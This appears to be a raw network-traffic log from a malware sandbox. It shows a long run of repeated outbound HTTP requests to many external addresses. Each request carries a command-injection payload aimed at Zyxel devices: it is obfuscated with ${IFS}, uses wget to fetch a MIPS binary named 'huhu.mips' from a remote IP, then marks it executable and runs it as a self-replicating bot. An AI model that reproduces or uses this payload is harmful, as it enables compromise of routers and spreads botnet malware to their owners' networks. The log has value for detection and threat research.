                                            Feb 2, 2024 06:21:15.677702904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4954192.168.2.153896054.208.28.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.677736998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4955192.168.2.1557936108.38.137.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.677788973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4956192.168.2.154853236.154.248.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.677804947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4957192.168.2.1543562126.132.229.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.677829981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4958192.168.2.1544960222.37.40.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.677884102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4959192.168.2.1559404197.179.50.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.677913904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4960192.168.2.1552212198.120.149.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.677941084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4961192.168.2.155627486.250.150.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.677990913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4962192.168.2.1544834209.223.34.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.678039074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4963192.168.2.1543326197.220.218.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.678066015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4964192.168.2.1558412102.30.173.13443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.678107023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4965192.168.2.1556568203.118.54.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.678144932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4966192.168.2.1541162208.118.215.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.678174973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4967192.168.2.1544848186.227.82.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.678220987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4968192.168.2.1541066110.191.161.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.678255081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4969192.168.2.1553950200.246.192.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.678317070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4970192.168.2.1548578207.246.199.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.678347111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4971192.168.2.1543510140.1.175.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.678384066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4972192.168.2.1555140151.145.37.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.678423882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4973192.168.2.154024442.177.208.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.678455114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4974192.168.2.155570268.2.186.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.678492069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4975192.168.2.1537882163.171.87.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.678541899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4976192.168.2.1537780151.138.70.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.678561926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4977192.168.2.1537154143.57.181.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.678602934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4978192.168.2.154251894.165.252.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.678654909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4979192.168.2.154226891.181.75.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.678699970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4980192.168.2.155969223.212.49.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.678726912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4981192.168.2.1551070193.200.114.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.678765059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4982192.168.2.1538518128.8.99.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.678813934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4983192.168.2.155435677.141.183.225443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.678858042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4984192.168.2.154158674.28.205.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.678891897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4985192.168.2.155193617.137.5.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.678947926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4986192.168.2.156095013.93.21.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.678982019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4987192.168.2.155684434.34.7.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.679008961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4988192.168.2.153282862.26.34.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.679044008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4989192.168.2.153751634.39.164.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.679080009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4990192.168.2.1534394125.104.146.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.679120064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4991192.168.2.155229870.117.6.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.679152966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4992192.168.2.156071061.65.199.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.679200888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4993192.168.2.1536636194.103.15.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.679239035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4994192.168.2.15415085.128.228.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.679286003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4995192.168.2.154541212.122.70.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.679325104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4996192.168.2.1537210148.103.1.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.679358959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4997192.168.2.155048280.21.215.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.679387093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4998192.168.2.153463242.36.193.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.679430008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4999192.168.2.1560068113.235.37.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.679455996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5000192.168.2.1545124151.90.213.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.679512024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5001192.168.2.1550254155.139.133.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.679554939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5002192.168.2.1559534120.238.205.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.679586887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5003192.168.2.1547480194.50.123.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.679609060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5004192.168.2.1534230113.150.183.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.679673910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5005192.168.2.153928893.10.43.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.679723024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5006192.168.2.1551922187.225.118.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.679883957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5007192.168.2.153921879.180.3.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.679908037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5008192.168.2.153803289.122.214.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.679956913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5009192.168.2.1549780183.110.50.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.680011988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5010192.168.2.1557854194.206.194.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.680053949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5011192.168.2.1540642155.164.8.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.680083990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5012192.168.2.1558438132.150.160.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.680107117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5013192.168.2.154559893.77.181.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.680159092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5014192.168.2.155056470.27.177.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.680171967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5015192.168.2.1549586207.27.139.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.680222988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5016192.168.2.1547846219.28.242.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.680244923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5017192.168.2.154322887.243.64.50443
                                            TimestampBytes transferredDirectionData
